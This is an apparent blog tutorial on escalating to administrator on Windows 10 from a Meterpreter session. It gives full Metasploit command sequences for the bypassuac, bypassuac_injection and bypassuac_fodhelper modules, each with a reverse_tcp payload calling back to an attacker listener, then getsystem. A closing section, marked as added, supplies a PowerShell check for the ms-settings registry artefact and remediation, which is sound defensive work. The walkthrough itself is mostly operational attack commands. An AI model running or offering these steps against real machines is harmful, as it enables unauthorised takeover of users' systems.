Using Meterpreter we have started a session with our target machine. The machine is running Windows 10, and we need to gain administrator privileges.
If you try the usual getsystem command, it fails with an error. Usually you can use the bypassuac module, but I have found that this also fails, with a message that this version of Windows 10 is not vulnerable to the attack.
In this blog post we will explore how to get around both the getsystem error and the bypassuac failure on Windows 10.
I will assume that you have already created your payload and initiated the reverse_tcp connection with the target machine. We are now connected and in the Meterpreter terminal.

If we run getuid we can see the username we are logged in with.
getsystem attempts to gain administrator privileges for us, but fails.

Usually at this point we could switch to the bypassuac module to gain administrator privileges.
meterpreter > background
msf6 > use exploit/windows/local/bypassuac
msf6 > set session 1
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set LHOST 10.0.2.4
msf6 > set LPORT 1234
msf6 > exploit
The above commands background the open Meterpreter session, load the bypassuac module, set the payload and run the exploit. However, on Windows 10 it fails with the message:
[-] Exploit aborted due to failure: not-vulnerable: Windows 10 (10.0 Build 17763). is not vulnerable.

Another method would be the bypassuac_injection module.
msf6 > use exploit/windows/local/bypassuac_injection
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set session 1
msf6 > set LHOST 10.0.2.4
msf6 > set LPORT 1234
msf6 > exploit
When we run this it fails with the error message:
[-] Exploit aborted due to failure: bad-config: x86 Target Selected for x64 System

If we switch back to our active session with sessions -i 1 and run getsystem again, we still get the same failure.

So what can we do on Windows 10 to get around this problem?
We can use the bypassuac module variant that goes through fodhelper. Let's take a look at how this works out.
msf6 > use exploit/windows/local/bypassuac_fodhelper
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set session 1
msf6 > set LHOST 10.0.2.4
msf6 > set LPORT 1234
msf6 > exploit
The result is that the Windows fodhelper.exe is spawned under a new shell that has UAC switched off.

You will now be back inside your session; sysinfo and getuid will both give the same details as before.

Now when you run getsystem it will be successful.
meterpreter > getsystem
meterpreter > getuid

You now have full administrator access to the Windows 10 machine. If you execute the shell command, it will give you a command prompt with full administrator privileges.
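From the defender's side, the fodhelper technique above leaves a characteristic trace: a handler for the ms-settings protocol planted under the current user's registry hive, which a clean system does not have. The following PowerShell check is an added example and not part of the original post; it assumes the well-documented HKCU ms-settings handler key is the indicator of interest and walks every loaded user hive looking for it.

```powershell
# Added example (not from the original post): report any loaded user hive
# that carries an ms-settings handler, the registry artefact left behind by
# fodhelper-based UAC bypass tooling. Assumption: only this key is checked.

$relativeKey = 'Software\Classes\ms-settings\shell\open\command'

function Get-MsSettingsHandlerHijack {
    # Returns one object per loaded user hive in which the handler key exists.
    # Requires rights to read other users' hives (run elevated for a full scan).
    if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
    }

    # Only real user SIDs; skip the *_Classes mirrors and the built-in hives.
    $userHives = Get-ChildItem -Path 'HKU:\' |
        Where-Object { $_.PSChildName -match '^S-1-5-21-' -and $_.PSChildName -notmatch '_Classes$' }

    foreach ($hive in $userHives) {
        $keyPath = Join-Path -Path "HKU:\$($hive.PSChildName)" -ChildPath $relativeKey
        if (Test-Path -Path $keyPath) {
            $props = Get-ItemProperty -Path $keyPath
            [pscustomobject]@{
                UserSid         = $hive.PSChildName
                KeyPath         = $keyPath
                Command         = $props.'(default)'     # what would be launched elevated
                DelegateExecute = $props.DelegateExecute  # empty value is the tell-tale marker
            }
        }
    }
}

$findings = @(Get-MsSettingsHandlerHijack)
if ($findings.Count -eq 0) {
    Write-Output 'No ms-settings handler found under any loaded user hive.'
} else {
    foreach ($f in $findings) {
        Write-Warning "ms-settings handler under $($f.UserSid): '$($f.Command)' (DelegateExecute present: $($null -ne $f.DelegateExecute))"
    }
}
```

Remediation is to remove the planted Software\Classes\ms-settings key from the affected hive and review how the user's session came to write it; raising UAC to "Always notify" also stops the auto-elevation that fodhelper relies on.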
